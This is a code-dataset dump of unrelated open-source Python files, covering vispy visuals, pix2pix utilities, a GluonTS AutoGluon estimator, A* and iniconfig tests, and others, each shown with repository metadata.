max_stars_repo_path
stringlengths
4
245
max_stars_repo_name
stringlengths
7
115
max_stars_count
int64
101
368k
id
stringlengths
2
8
content
stringlengths
6
1.03M
gfwlist/gen.py
lipeijian/shadowsocks-android
137
8140
<reponame>lipeijian/shadowsocks-android #!/usr/bin/python # -*- encoding: utf8 -*- import itertools import math import sys import IPy def main(): china_list_set = IPy.IPSet() for line in sys.stdin: china_list_set.add(IPy.IP(line)) # 输出结果 for ip in china_list_set: print '<item>' + str(ip) + '</item>' if __name__ == "__main__": main()
examples/basics/visuals/line_prototype.py
3DAlgoLab/vispy
2,617
8174
# -*- coding: utf-8 -*- # vispy: gallery 10 # Copyright (c) Vispy Development Team. All Rights Reserved. # Distributed under the (new) BSD License. See LICENSE.txt for more info. import sys import numpy as np from vispy import app, gloo, visuals from vispy.visuals.filters import Clipper, ColorFilter from vispy.visuals.shaders import MultiProgram from vispy.visuals.collections import PointCollection from vispy.visuals.transforms import STTransform from vispy.scene import SceneCanvas from vispy.scene.visuals import create_visual_node class LineVisual(visuals.Visual): """Example of a very simple GL-line visual. This shows the minimal set of methods that need to be reimplemented to make a new visual class. """ def __init__(self, pos=None, color=(1, 1, 1, 1)): vcode = """ attribute vec2 a_pos; void main() { gl_Position = $transform(vec4(a_pos, 0., 1.)); gl_PointSize = 10.; } """ fcode = """ void main() { gl_FragColor = $color; } """ visuals.Visual.__init__(self, vcode=vcode, fcode=fcode) self.pos_buf = gloo.VertexBuffer() # The Visual superclass contains a MultiProgram, which is an object # that behaves like a normal shader program (you can assign shader # code, upload values, set template variables, etc.) but internally # manages multiple ModularProgram instances, one per view. # The MultiProgram is accessed via the `shared_program` property, so # the following modifications to the program will be applied to all # views: self.shared_program['a_pos'] = self.pos_buf self.shared_program.frag['color'] = color self._need_upload = False # Visual keeps track of draw mode, index buffer, and GL state. These # are shared between all views. self._draw_mode = 'line_strip' self.set_gl_state('translucent', depth_test=False) if pos is not None: self.set_data(pos) def set_data(self, pos): self._pos = pos self._need_upload = True def _prepare_transforms(self, view=None): view.view_program.vert['transform'] = view.transforms.get_transform() def _prepare_draw(self, view=None): """This method is called immediately before each draw. The *view* argument indicates which view is about to be drawn. """ if self._need_upload: # Note that pos_buf is shared between all views, so we have no need # to use the *view* argument in this example. This will be true # for most visuals. self.pos_buf.set_data(self._pos) self._need_upload = False class PointVisual(LineVisual): """Another simple visual class. Due to the simplicity of these example classes, it was only necessary to subclass from LineVisual and set the draw mode to 'points'. A more fully-featured PointVisual class might not follow this approach. """ def __init__(self, pos=None, color=(1, 1, 1, 1)): LineVisual.__init__(self, pos, color) self._draw_mode = 'points' class PlotLineVisual(visuals.CompoundVisual): """An example compound visual that draws lines and points. To the user, the compound visual behaves exactly like a normal visual--it has a transform system, draw() and bounds() methods, etc. Internally, the compound visual automatically manages proxying these transforms and methods to its sub-visuals. """ def __init__(self, pos=None, line_color=(1, 1, 1, 1), point_color=(1, 1, 1, 1)): self._line = LineVisual(pos, color=line_color) self._point = PointVisual(pos, color=point_color) visuals.CompoundVisual.__init__(self, [self._line, self._point]) class PointCollectionVisual(visuals.Visual): """Thin wrapper around a point collection. Note: This is currently broken! """ def __init__(self): prog = MultiProgram(vcode='', fcode='') self.points = PointCollection("agg", color="shared", program=prog) visuals.Visual.__init__(self, program=prog) def _prepare_draw(self, view): if self.points._need_update: self.points._update() self._draw_mode = self.points._mode self._index_buffer = self.points._indices_buffer def append(self, *args, **kwargs): self.points.append(*args, **kwargs) def _prepare_transforms(self, view=None): pass @property def color(self): return self.points['color'] @color.setter def color(self, c): self.points['color'] = c class PanZoomTransform(STTransform): def __init__(self, canvas=None, aspect=None, **kwargs): self._aspect = aspect self.attach(canvas) STTransform.__init__(self, **kwargs) def attach(self, canvas): """ Attach this tranform to a canvas """ self._canvas = canvas canvas.events.mouse_wheel.connect(self.on_mouse_wheel) canvas.events.mouse_move.connect(self.on_mouse_move) def on_mouse_move(self, event): if event.is_dragging: dxy = event.pos - event.last_event.pos button = event.press_event.button if button == 1: self.move(dxy) elif button == 2: center = event.press_event.pos if self._aspect is None: self.zoom(np.exp(dxy * (0.01, -0.01)), center) else: s = dxy[1] * -0.01 self.zoom(np.exp(np.array([s, s])), center) def on_mouse_wheel(self, event): self.zoom(np.exp(event.delta * (0.01, -0.01)), event.pos) canvas = app.Canvas(keys='interactive', size=(900, 600), show=True, title="Visual Canvas") pos = np.random.normal(size=(1000, 2), loc=0, scale=50).astype('float32') pos[0] = [0, 0] # Make a line visual line = LineVisual(pos=pos) line.transforms.canvas = canvas line.transform = STTransform(scale=(2, 1), translate=(20, 20)) panzoom = PanZoomTransform(canvas) line.transforms.scene_transform = panzoom panzoom.changed.connect(lambda ev: canvas.update()) # Attach color filter to all views (current and future) of the visual line.attach(ColorFilter((1, 1, 0.5, 0.7))) # Attach a clipper just to this view. The Clipper filter requires a # transform that maps from the framebuffer coordinate system to the # clipping coordinates. tr = line.transforms.get_transform('framebuffer', 'canvas') line.attach(Clipper((20, 20, 260, 260), transform=tr), view=line) # Make a view of the line that will draw its shadow shadow = line.view() shadow.transforms.canvas = canvas shadow.transform = STTransform(scale=(2, 1), translate=(25, 25)) shadow.transforms.scene_transform = panzoom shadow.attach(ColorFilter((0, 0, 0, 0.6)), view=shadow) tr = shadow.transforms.get_transform('framebuffer', 'canvas') shadow.attach(Clipper((20, 20, 260, 260), transform=tr), view=shadow) # And make a second view of the line with different clipping bounds view = line.view() view.transforms.canvas = canvas view.transform = STTransform(scale=(2, 0.5), translate=(450, 150)) tr = view.transforms.get_transform('framebuffer', 'canvas') view.attach(Clipper((320, 20, 260, 260), transform=tr), view=view) # Make a compound visual plot = PlotLineVisual(pos, (0.5, 1, 0.5, 0.2), (0.5, 1, 1, 0.3)) plot.transforms.canvas = canvas plot.transform = STTransform(translate=(80, 450), scale=(1.5, 1)) tr = plot.transforms.get_transform('framebuffer', 'canvas') plot.attach(Clipper((20, 320, 260, 260), transform=tr), view=plot) # And make a view on the compound view2 = plot.view() view2.transforms.canvas = canvas view2.transform = STTransform(scale=(1.5, 1), translate=(450, 400)) tr = view2.transforms.get_transform('framebuffer', 'canvas') view2.attach(Clipper((320, 320, 260, 260), transform=tr), view=view2) # And a shadow for the view shadow2 = plot.view() shadow2.transforms.canvas = canvas shadow2.transform = STTransform(scale=(1.5, 1), translate=(455, 405)) shadow2.attach(ColorFilter((0, 0, 0, 0.6)), view=shadow2) tr = shadow2.transforms.get_transform('framebuffer', 'canvas') shadow2.attach(Clipper((320, 320, 260, 260), transform=tr), view=shadow2) # Example of a collection visual collection = PointCollectionVisual() collection.transforms.canvas = canvas collection.transform = STTransform(translate=(750, 150)) collection.append(np.random.normal(loc=0, scale=20, size=(10000, 3)), itemsize=5000) collection.color = (1, 0.5, 0.5, 1), (0.5, 0.5, 1, 1) shadow3 = collection.view() shadow3.transforms.canvas = canvas shadow3.transform = STTransform(scale=(1, 1), translate=(752, 152)) shadow3.attach(ColorFilter((0, 0, 0, 0.6)), view=shadow3) # tr = shadow3.transforms.get_transform('framebuffer', 'canvas') # shadow3.attach(Clipper((320, 320, 260, 260), transform=tr), view=shadow2) order = [shadow, line, view, plot, shadow2, view2, shadow3, collection] @canvas.connect def on_draw(event): canvas.context.clear((0.3, 0.3, 0.3, 1.0)) for v in order: v.draw() def on_resize(event): # Set canvas viewport and reconfigure visual transforms to match. vp = (0, 0, canvas.physical_size[0], canvas.physical_size[1]) canvas.context.set_viewport(*vp) for v in order: v.transforms.configure(canvas=canvas, viewport=vp) canvas.events.resize.connect(on_resize) on_resize(None) Line = create_visual_node(LineVisual) canvas2 = SceneCanvas(keys='interactive', title='Scene Canvas', show=True) v = canvas2.central_widget.add_view(margin=10) v.border_color = (1, 1, 1, 1) v.bgcolor = (0.3, 0.3, 0.3, 1) v.camera = 'panzoom' line2 = Line(pos, parent=v.scene) def mouse(ev): print(ev) v.events.mouse_press.connect(mouse) if __name__ == '__main__': if sys.flags.interactive != 1: app.run()
util/util.py
harshitAgr/vess2ret
111
8177
"""Auxiliary methods.""" import os import json from errno import EEXIST import numpy as np import seaborn as sns import cPickle as pickle import matplotlib.pyplot as plt sns.set() DEFAULT_LOG_DIR = 'log' ATOB_WEIGHTS_FILE = 'atob_weights.h5' D_WEIGHTS_FILE = 'd_weights.h5' class MyDict(dict): """ Dictionary that allows to access elements with dot notation. ex: >> d = MyDict({'key': 'val'}) >> d.key 'val' >> d.key2 = 'val2' >> d {'key2': 'val2', 'key': 'val'} """ __getattr__ = dict.get __setattr__ = dict.__setitem__ def convert_to_rgb(img, is_binary=False): """Given an image, make sure it has 3 channels and that it is between 0 and 1.""" if len(img.shape) != 3: raise Exception("""Image must have 3 dimensions (channels x height x width). """ """Given {0}""".format(len(img.shape))) img_ch, _, _ = img.shape if img_ch != 3 and img_ch != 1: raise Exception("""Unsupported number of channels. """ """Must be 1 or 3, given {0}.""".format(img_ch)) imgp = img if img_ch == 1: imgp = np.repeat(img, 3, axis=0) if not is_binary: imgp = imgp * 127.5 + 127.5 imgp /= 255. return np.clip(imgp.transpose((1, 2, 0)), 0, 1) def compose_imgs(a, b, is_a_binary=True, is_b_binary=False): """Place a and b side by side to be plotted.""" ap = convert_to_rgb(a, is_binary=is_a_binary) bp = convert_to_rgb(b, is_binary=is_b_binary) if ap.shape != bp.shape: raise Exception("""A and B must have the same size. """ """{0} != {1}""".format(ap.shape, bp.shape)) # ap.shape and bp.shape must have the same size here h, w, ch = ap.shape composed = np.zeros((h, 2*w, ch)) composed[:, :w, :] = ap composed[:, w:, :] = bp return composed def get_log_dir(log_dir, expt_name): """Compose the log_dir with the experiment name.""" if log_dir is None: raise Exception('log_dir can not be None.') if expt_name is not None: return os.path.join(log_dir, expt_name) return log_dir def mkdir(mypath): """Create a directory if it does not exist.""" try: os.makedirs(mypath) except OSError as exc: if exc.errno == EEXIST and os.path.isdir(mypath): pass else: raise def create_expt_dir(params): """Create the experiment directory and return it.""" expt_dir = get_log_dir(params.log_dir, params.expt_name) # Create directories if they do not exist mkdir(params.log_dir) mkdir(expt_dir) # Save the parameters json.dump(params, open(os.path.join(expt_dir, 'params.json'), 'wb'), indent=4, sort_keys=True) return expt_dir def plot_loss(loss, label, filename, log_dir): """Plot a loss function and save it in a file.""" plt.figure(figsize=(5, 4)) plt.plot(loss, label=label) plt.legend() plt.savefig(os.path.join(log_dir, filename)) plt.clf() def log(losses, atob, it_val, N=4, log_dir=DEFAULT_LOG_DIR, expt_name=None, is_a_binary=True, is_b_binary=False): """Log losses and atob results.""" log_dir = get_log_dir(log_dir, expt_name) # Save the losses for further inspection pickle.dump(losses, open(os.path.join(log_dir, 'losses.pkl'), 'wb')) ########################################################################### # PLOT THE LOSSES # ########################################################################### plot_loss(losses['d'], 'discriminator', 'd_loss.png', log_dir) plot_loss(losses['d_val'], 'discriminator validation', 'd_val_loss.png', log_dir) plot_loss(losses['p2p'], 'Pix2Pix', 'p2p_loss.png', log_dir) plot_loss(losses['p2p_val'], 'Pix2Pix validation', 'p2p_val_loss.png', log_dir) ########################################################################### # PLOT THE A->B RESULTS # ########################################################################### plt.figure(figsize=(10, 6)) for i in range(N*N): a, _ = next(it_val) bp = atob.predict(a) img = compose_imgs(a[0], bp[0], is_a_binary=is_a_binary, is_b_binary=is_b_binary) plt.subplot(N, N, i+1) plt.imshow(img) plt.axis('off') plt.savefig(os.path.join(log_dir, 'atob.png')) plt.clf() # Make sure all the figures are closed. plt.close('all') def save_weights(models, log_dir=DEFAULT_LOG_DIR, expt_name=None): """Save the weights of the models into a file.""" log_dir = get_log_dir(log_dir, expt_name) models.atob.save_weights(os.path.join(log_dir, ATOB_WEIGHTS_FILE), overwrite=True) models.d.save_weights(os.path.join(log_dir, D_WEIGHTS_FILE), overwrite=True) def load_weights(atob, d, log_dir=DEFAULT_LOG_DIR, expt_name=None): """Load the weights into the corresponding models.""" log_dir = get_log_dir(log_dir, expt_name) atob.load_weights(os.path.join(log_dir, ATOB_WEIGHTS_FILE)) d.load_weights(os.path.join(log_dir, D_WEIGHTS_FILE)) def load_weights_of(m, weights_file, log_dir=DEFAULT_LOG_DIR, expt_name=None): """Load the weights of the model m.""" log_dir = get_log_dir(log_dir, expt_name) m.load_weights(os.path.join(log_dir, weights_file)) def load_losses(log_dir=DEFAULT_LOG_DIR, expt_name=None): """Load the losses of the given experiment.""" log_dir = get_log_dir(log_dir, expt_name) losses = pickle.load(open(os.path.join(log_dir, 'losses.pkl'), 'rb')) return losses def load_params(params): """ Load the parameters of an experiment and return them. The params passed as argument will be merged with the new params dict. If there is a conflict with a key, the params passed as argument prevails. """ expt_dir = get_log_dir(params.log_dir, params.expt_name) expt_params = json.load(open(os.path.join(expt_dir, 'params.json'), 'rb')) # Update the loaded parameters with the current parameters. This will # override conflicting keys as expected. expt_params.update(params) return expt_params
demo/gpnas/CVPR2021_NAS_competition_gpnas_demo.py
ZichaoGuo/PaddleSlim
926
8203
<filename>demo/gpnas/CVPR2021_NAS_competition_gpnas_demo.py # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License" # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import copy import numpy as np from paddleslim.nas import GPNAS # 使用GP-NAS参加[CVPR 2021 NAS国际比赛](https://www.cvpr21-nas.com/competition) Track2 demo # [CVPR 2021 NAS国际比赛Track2 studio地址](https://aistudio.baidu.com/aistudio/competition/detail/71?lang=en) # [AI studio GP-NAS demo](https://aistudio.baidu.com/aistudio/projectdetail/1824958) # demo 基于paddleslim自研NAS算法GP-NAS:Gaussian Process based Neural Architecture Search # 基于本demo的改进版可以获得双倍奖金 def preprare_trainning_data(file_name, t_flag): ## t_flag ==1 using all trainning data ## t_flag ==2 using half trainning data with open(file_name, 'r') as f: arch_dict = json.load(f) Y_all = [] X_all = [] for sub_dict in arch_dict.items(): Y_all.append(sub_dict[1]['acc'] * 100) X_all.append(np.array(sub_dict[1]['arch']).T.reshape(4, 16)[2]) X_all, Y_all = np.array(X_all), np.array(Y_all) X_train, Y_train, X_test, Y_test = X_all[0::t_flag], Y_all[ 0::t_flag], X_all[1::t_flag], Y_all[1::t_flag] return X_train, Y_train, X_test, Y_test if __name__ == '__main__': stage1_file = './datasets/Track2_stage1_trainning.json' stage2_file = './datasets/Track2_stage2_few_show_trainning.json' X_train_stage1, Y_train_stage1, X_test_stage1, Y_test_stage1 = preprare_trainning_data( stage1_file, 1) X_train_stage2, Y_train_stage2, X_test_stage2, Y_test_stage2 = preprare_trainning_data( stage2_file, 2) gpnas = GPNAS() w = gpnas.get_initial_mean(X_test_stage1, Y_test_stage1) init_cov = gpnas.get_initial_cov(X_train_stage1) error_list = np.array( Y_test_stage2.reshape(len(Y_test_stage2), 1) - gpnas.get_predict( X_test_stage2)) print('RMSE trainning on stage1 testing on stage2:', np.sqrt(np.dot(error_list.T, error_list) / len(error_list))) gpnas.get_posterior_mean(X_train_stage2[0::3], Y_train_stage2[0::3]) gpnas.get_posterior_mean(X_train_stage2[1::3], Y_train_stage2[1::3]) gpnas.get_posterior_cov(X_train_stage2[1::3], Y_train_stage2[1::3]) error_list = np.array( Y_test_stage2.reshape(len(Y_test_stage2), 1) - gpnas.get_predict_jiont( X_test_stage2, X_train_stage2[::1], Y_train_stage2[::1])) print('RMSE using stage1 as prior:', np.sqrt(np.dot(error_list.T, error_list) / len(error_list)))
windows_packages_gpu/torch/nn/intrinsic/qat/modules/linear_relu.py
codeproject/DeepStack
353
8207
from __future__ import absolute_import, division, print_function, unicode_literals import torch.nn.qat as nnqat import torch.nn.intrinsic import torch.nn.functional as F class LinearReLU(nnqat.Linear): r""" A LinearReLU module fused from Linear and ReLU modules, attached with FakeQuantize modules for output activation and weight, used in quantization aware training. We adopt the same interface as :class:`torch.nn.Linear`. Similar to `torch.nn.intrinsic.LinearReLU`, with FakeQuantize modules initialized to default. Attributes: activation_post_process: fake quant module for output activation weight: fake quant module for weight Examples:: >>> m = nn.qat.LinearReLU(20, 30) >>> input = torch.randn(128, 20) >>> output = m(input) >>> print(output.size()) torch.Size([128, 30]) """ _FLOAT_MODULE = torch.nn.intrinsic.LinearReLU def __init__(self, in_features, out_features, bias=True, qconfig=None): super(LinearReLU, self).__init__(in_features, out_features, bias, qconfig) def forward(self, input): return self.activation_post_process(F.relu( F.linear(input, self.weight_fake_quant(self.weight), self.bias))) @classmethod def from_float(cls, mod, qconfig=None): return super(LinearReLU, cls).from_float(mod, qconfig)
tests/basic/test_basic.py
kopp/python-astar
133
8219
import unittest import astar class BasicTests(unittest.TestCase): def test_bestpath(self): """ensure that we take the shortest path, and not the path with less elements. the path with less elements is A -> B with a distance of 100 the shortest path is A -> C -> D -> B with a distance of 60 """ nodes = {'A': [('B', 100), ('C', 20)], 'C': [('D', 20)], 'D': [('B', 20)]} def neighbors(n): for n1, d in nodes[n]: yield n1 def distance(n1, n2): for n, d in nodes[n1]: if n == n2: return d def cost(n, goal): return 1 path = list(astar.find_path('A', 'B', neighbors_fnct=neighbors, heuristic_cost_estimate_fnct=cost, distance_between_fnct=distance)) self.assertEqual(4, len(path)) for i, n in enumerate('ACDB'): self.assertEqual(n, path[i]) if __name__ == '__main__': unittest.main()
src/gluonts/nursery/autogluon_tabular/estimator.py
Xiaoxiong-Liu/gluon-ts
2,648
8239
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://www.apache.org/licenses/LICENSE-2.0 # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. import logging from typing import Callable, Optional, List, Tuple import pandas as pd from autogluon.tabular import TabularPredictor as AutogluonTabularPredictor from gluonts.core.component import validated from gluonts.dataset.common import Dataset from gluonts.dataset.util import to_pandas from gluonts.model.estimator import Estimator from gluonts.time_feature import ( TimeFeature, get_lags_for_frequency, time_features_from_frequency_str, ) from .predictor import ( TabularPredictor, mean_abs_scaling, get_features_dataframe, ) logger = logging.getLogger(__name__) class TabularEstimator(Estimator): """An estimator that trains an Autogluon Tabular model for time series forecasting. Additional keyword arguments to the constructor, other than the ones documented below, will be passed on to Autogluon Tabular's ``fit`` method used for training the model. Parameters ---------- freq Frequency of the data to handle prediction_length Prediction length lag_indices List of indices of the lagged observations to use as features. If None, this will be set automatically based on the frequency. time_features List of time features to be used. If None, this will be set automatically based on the frequency. scaling Function to be used to scale time series. This should take a pd.Series object as input, and return a scaled pd.Series and the scale (float). By default, this divides a series by the mean of its absolute value. batch_size Batch size of the resulting predictor; this is just used at prediction time, and does not affect training in any way. disable_auto_regression Whether to forecefully disable auto-regression in the model. If ``True``, this will remove any lag index which is smaller than ``prediction_length``. This will make predictions more efficient, but may impact their accuracy. quantiles_to_predict Whether to forecast in quantile way. If assigned with quantile values, this will train model using quantile prediction model. If None, then the model will be trained in a regular way. """ @validated() def __init__( self, freq: str, prediction_length: int, lag_indices: Optional[List[int]] = None, time_features: Optional[List[TimeFeature]] = None, scaling: Callable[ [pd.Series], Tuple[pd.Series, float] ] = mean_abs_scaling, batch_size: Optional[int] = 32, disable_auto_regression: bool = False, last_k_for_val: Optional[int] = None, quantiles_to_predict: Optional[List[float]] = None, eval_metric: str = "mean_absolute_error", **kwargs, ) -> None: super().__init__() self.freq = freq self.prediction_length = prediction_length self.lag_indices = ( lag_indices if lag_indices is not None else get_lags_for_frequency(self.freq) ) self.time_features = ( time_features if time_features is not None else time_features_from_frequency_str(self.freq) ) self.batch_size = batch_size self.disable_auto_regression = disable_auto_regression self.scaling = scaling self.last_k_for_val = last_k_for_val self.eval_metric = eval_metric self.quantiles_to_predict = quantiles_to_predict if self.disable_auto_regression: self.lag_indices = [ lag_idx for lag_idx in self.lag_indices if lag_idx >= self.prediction_length ] default_kwargs = { "time_limit": 60, # "excluded_model_types": ["KNN", "XT", "RF"], "presets": [ "high_quality_fast_inference_only_refit", "optimize_for_deployment", ], "auto_stack": True, } self.kwargs = {**default_kwargs, **kwargs} def train( self, training_data: Dataset, validation_data: Optional[Dataset] = None, ) -> TabularPredictor: kwargs_override = {} dfs = [ get_features_dataframe( series=self.scaling(to_pandas(entry))[0], time_features=self.time_features, lag_indices=self.lag_indices, ) for entry in training_data ] if validation_data is not None or self.last_k_for_val is not None: kwargs_override["auto_stack"] = False logger.warning( "Auto Stacking is turned off " "as validation dataset is provided before input into Tabular Predictor." ) if validation_data is not None: logger.log(20, "Validation dataset is directly provided.") validation_dfs = [ get_features_dataframe( series=self.scaling(to_pandas(entry))[0], time_features=self.time_features, lag_indices=self.lag_indices, ) for entry in validation_data ] train_df = pd.concat(dfs) val_df = pd.concat(validation_dfs) elif self.last_k_for_val is not None: logger.log( 20, f"last_k_for_val is provided, choosing last {self.last_k_for_val} of each time series as validation set.", ) train_dfs = [ tmp_df.iloc[: -self.last_k_for_val, :] for tmp_df in dfs ] validation_dfs = [ tmp_df.iloc[-self.last_k_for_val :, :] for tmp_df in dfs ] train_df = pd.concat(train_dfs) val_df = pd.concat(validation_dfs) else: logger.log( 20, "No validation dataset is provided, will let TabularPredictor do the splitting automatically," "Note that this might break the time order of time series data.", ) train_df = pd.concat(dfs) val_df = None if self.quantiles_to_predict is not None: ag_model = AutogluonTabularPredictor( label="target", problem_type="quantile", quantile_levels=self.quantiles_to_predict, ).fit( train_df, tuning_data=val_df, **{**self.kwargs, **kwargs_override}, ) else: ag_model = AutogluonTabularPredictor( label="target", problem_type="regression", eval_metric=self.eval_metric, ).fit( train_df, tuning_data=val_df, **{**self.kwargs, **kwargs_override}, ) return TabularPredictor( ag_model=ag_model, freq=self.freq, prediction_length=self.prediction_length, time_features=self.time_features, lag_indices=self.lag_indices, scaling=self.scaling, batch_size=self.batch_size, quantiles_to_predict=self.quantiles_to_predict, )
pre_embed.py
shelleyyyyu/few_shot
253
8251
import numpy as np from collections import defaultdict, Counter import random import json from tqdm import tqdm def transX(dataset): rel2id = json.load(open(dataset + '/relation2ids')) ent2id = json.load(open(dataset + '/ent2ids')) with open('../Fast-TransX/' + dataset + '_base/entity2id.txt', 'w') as g1: num_ents = len(ent2id.keys()) g1.write(str(num_ents) + '\n') for k, v in ent2id.items(): g1.write(k + '\t' + str(v) + '\n') with open('../Fast-TransX/' + dataset + '_base/relation2id.txt', 'w') as g1: num_rels = len(rel2id.keys()) g1.write(str(num_rels) + '\n') for k, v in rel2id.items(): g1.write(k + '\t' + str(v) + '\n') file_name = dataset + '/path_graph' train_triples = [] with open(file_name) as f: lines = f.readlines() for line in tqdm(lines): e1 = line.split('\t')[0] e2 = line.rstrip().split('\t')[2] rel = line.split('\t')[1] train_triples.append([e1,rel,e2]) train_triples.append([e2,rel+'_inv',e1]) with open('../Fast-TransX/' + dataset + '_base/train2id.txt', 'w') as g3: num_triples = len(train_triples) g3.write(str(num_triples) + '\n') for triple in train_triples: e1, rel, e2 = triple g3.write(str(ent2id[e1]) + '\t' + str(ent2id[e2]) + '\t' + str(rel2id[rel]) + '\n') if __name__ == '__main__': transX('Wiki')
amadeus/travel/trip_parser_jobs/_status.py
akshitsingla/amadeus-python
125
8279
<reponame>akshitsingla/amadeus-python<gh_stars>100-1000 from amadeus.client.decorator import Decorator class TripParserStatus(Decorator, object): def __init__(self, client, job_id): Decorator.__init__(self, client) self.job_id = job_id def get(self, **params): ''' Returns the parsing status and the link to the result in case of successful parsing. .. code-block:: python amadeus.travel.trip_parser_jobs.status('XXX').get :rtype: amadeus.Response :raises amadeus.ResponseError: if the request could not be completed ''' return self.client.get( '/v2/travel/trip-parser-jobs/{0}'.format(self.job_id), **params)
tools/third_party/iniconfig/testing/test_iniconfig.py
meyerweb/wpt
2,479
8280
<gh_stars>1000+ import py import pytest from iniconfig import IniConfig, ParseError, __all__ as ALL from iniconfig import iscommentline from textwrap import dedent check_tokens = { 'section': ( '[section]', [(0, 'section', None, None)] ), 'value': ( 'value = 1', [(0, None, 'value', '1')] ), 'value in section': ( '[section]\nvalue=1', [(0, 'section', None, None), (1, 'section', 'value', '1')] ), 'value with continuation': ( 'names =\n Alice\n Bob', [(0, None, 'names', 'Alice\nBob')] ), 'value with aligned continuation': ( 'names = Alice\n' ' Bob', [(0, None, 'names', 'Alice\nBob')] ), 'blank line': ( '[section]\n\nvalue=1', [(0, 'section', None, None), (2, 'section', 'value', '1')] ), 'comment': ( '# comment', [] ), 'comment on value': ( 'value = 1', [(0, None, 'value', '1')] ), 'comment on section': ( '[section] #comment', [(0, 'section', None, None)] ), 'comment2': ( '; comment', [] ), 'comment2 on section': ( '[section] ;comment', [(0, 'section', None, None)] ), 'pseudo section syntax in value': ( 'name = value []', [(0, None, 'name', 'value []')] ), 'assignment in value': ( 'value = x = 3', [(0, None, 'value', 'x = 3')] ), 'use of colon for name-values': ( 'name: y', [(0, None, 'name', 'y')] ), 'use of colon without space': ( 'value:y=5', [(0, None, 'value', 'y=5')] ), 'equality gets precedence': ( 'value=xyz:5', [(0, None, 'value', 'xyz:5')] ), } @pytest.fixture(params=sorted(check_tokens)) def input_expected(request): return check_tokens[request.param] @pytest.fixture def input(input_expected): return input_expected[0] @pytest.fixture def expected(input_expected): return input_expected[1] def parse(input): # only for testing purposes - _parse() does not use state except path ini = object.__new__(IniConfig) ini.path = "sample" return ini._parse(input.splitlines(True)) def parse_a_error(input): return py.test.raises(ParseError, parse, input) def test_tokenize(input, expected): parsed = parse(input) assert parsed == expected def test_parse_empty(): parsed = parse("") assert not parsed ini = IniConfig("sample", "") assert not ini.sections def test_ParseError(): e = ParseError("filename", 0, "hello") assert str(e) == "filename:1: hello" def test_continuation_needs_perceeding_token(): excinfo = parse_a_error(' Foo') assert excinfo.value.lineno == 0 def test_continuation_cant_be_after_section(): excinfo = parse_a_error('[section]\n Foo') assert excinfo.value.lineno == 1 def test_section_cant_be_empty(): excinfo = parse_a_error('[]') assert excinfo.value.lineno == 0 @py.test.mark.parametrize('line', [ '!!', ]) def test_error_on_weird_lines(line): parse_a_error(line) def test_iniconfig_from_file(tmpdir): path = tmpdir/'test.txt' path.write('[metadata]\nname=1') config = IniConfig(path=path) assert list(config.sections) == ['metadata'] config = IniConfig(path, "[diff]") assert list(config.sections) == ['diff'] with pytest.raises(TypeError): IniConfig(data=path.read()) def test_iniconfig_section_first(tmpdir): with pytest.raises(ParseError) as excinfo: IniConfig("x", data='name=1') assert excinfo.value.msg == "no section header defined" def test_iniconig_section_duplicate_fails(): with pytest.raises(ParseError) as excinfo: IniConfig("x", data='[section]\n[section]') assert 'duplicate section' in str(excinfo.value) def test_iniconfig_duplicate_key_fails(): with pytest.raises(ParseError) as excinfo: IniConfig("x", data='[section]\nname = Alice\nname = bob') assert 'duplicate name' in str(excinfo.value) def test_iniconfig_lineof(): config = IniConfig("x.ini", data=( '[section]\n' 'value = 1\n' '[section2]\n' '# comment\n' 'value =2' )) assert config.lineof('missing') is None assert config.lineof('section') == 1 assert config.lineof('section2') == 3 assert config.lineof('section', 'value') == 2 assert config.lineof('section2', 'value') == 5 assert config['section'].lineof('value') == 2 assert config['section2'].lineof('value') == 5 def test_iniconfig_get_convert(): config = IniConfig("x", data='[section]\nint = 1\nfloat = 1.1') assert config.get('section', 'int') == '1' assert config.get('section', 'int', convert=int) == 1 def test_iniconfig_get_missing(): config = IniConfig("x", data='[section]\nint = 1\nfloat = 1.1') assert config.get('section', 'missing', default=1) == 1 assert config.get('section', 'missing') is None def test_section_get(): config = IniConfig("x", data='[section]\nvalue=1') section = config['section'] assert section.get('value', convert=int) == 1 assert section.get('value', 1) == "1" assert section.get('missing', 2) == 2 def test_missing_section(): config = IniConfig("x", data='[section]\nvalue=1') with pytest.raises(KeyError): config["other"] def test_section_getitem(): config = IniConfig("x", data='[section]\nvalue=1') assert config['section']['value'] == '1' assert config['section']['value'] == '1' def test_section_iter(): config = IniConfig("x", data='[section]\nvalue=1') names = list(config['section']) assert names == ['value'] items = list(config['section'].items()) assert items == [('value', '1')] def test_config_iter(): config = IniConfig("x.ini", data=dedent(''' [section1] value=1 [section2] value=2 ''')) l = list(config) assert len(l) == 2 assert l[0].name == 'section1' assert l[0]['value'] == '1' assert l[1].name == 'section2' assert l[1]['value'] == '2' def test_config_contains(): config = IniConfig("x.ini", data=dedent(''' [section1] value=1 [section2] value=2 ''')) assert 'xyz' not in config assert 'section1' in config assert 'section2' in config def test_iter_file_order(): config = IniConfig("x.ini", data=""" [section2] #cpython dict ordered before section value = 1 value2 = 2 # dict ordered before value [section] a = 1 b = 2 """) l = list(config) secnames = [x.name for x in l] assert secnames == ['section2', 'section'] assert list(config['section2']) == ['value', 'value2'] assert list(config['section']) == ['a', 'b'] def test_example_pypirc(): config = IniConfig("pypirc", data=dedent(''' [distutils] index-servers = pypi other [pypi] repository: <repository-url> username: <username> password: <password> [other] repository: http://example.com/pypi username: <username> password: <password> ''')) distutils, pypi, other = list(config) assert distutils["index-servers"] == "pypi\nother" assert pypi['repository'] == '<repository-url>' assert pypi['username'] == '<username>' assert pypi['password'] == '<password>' assert ['repository', 'username', 'password'] == list(other) def test_api_import(): assert ALL == ['IniConfig', 'ParseError'] @pytest.mark.parametrize("line", [ "#qwe", " #qwe", ";qwe", " ;qwe", ]) def test_iscommentline_true(line): assert iscommentline(line)
analysis/calculate_holding_amount.py
hao44le/ico_top_holder_analysis
538
8297
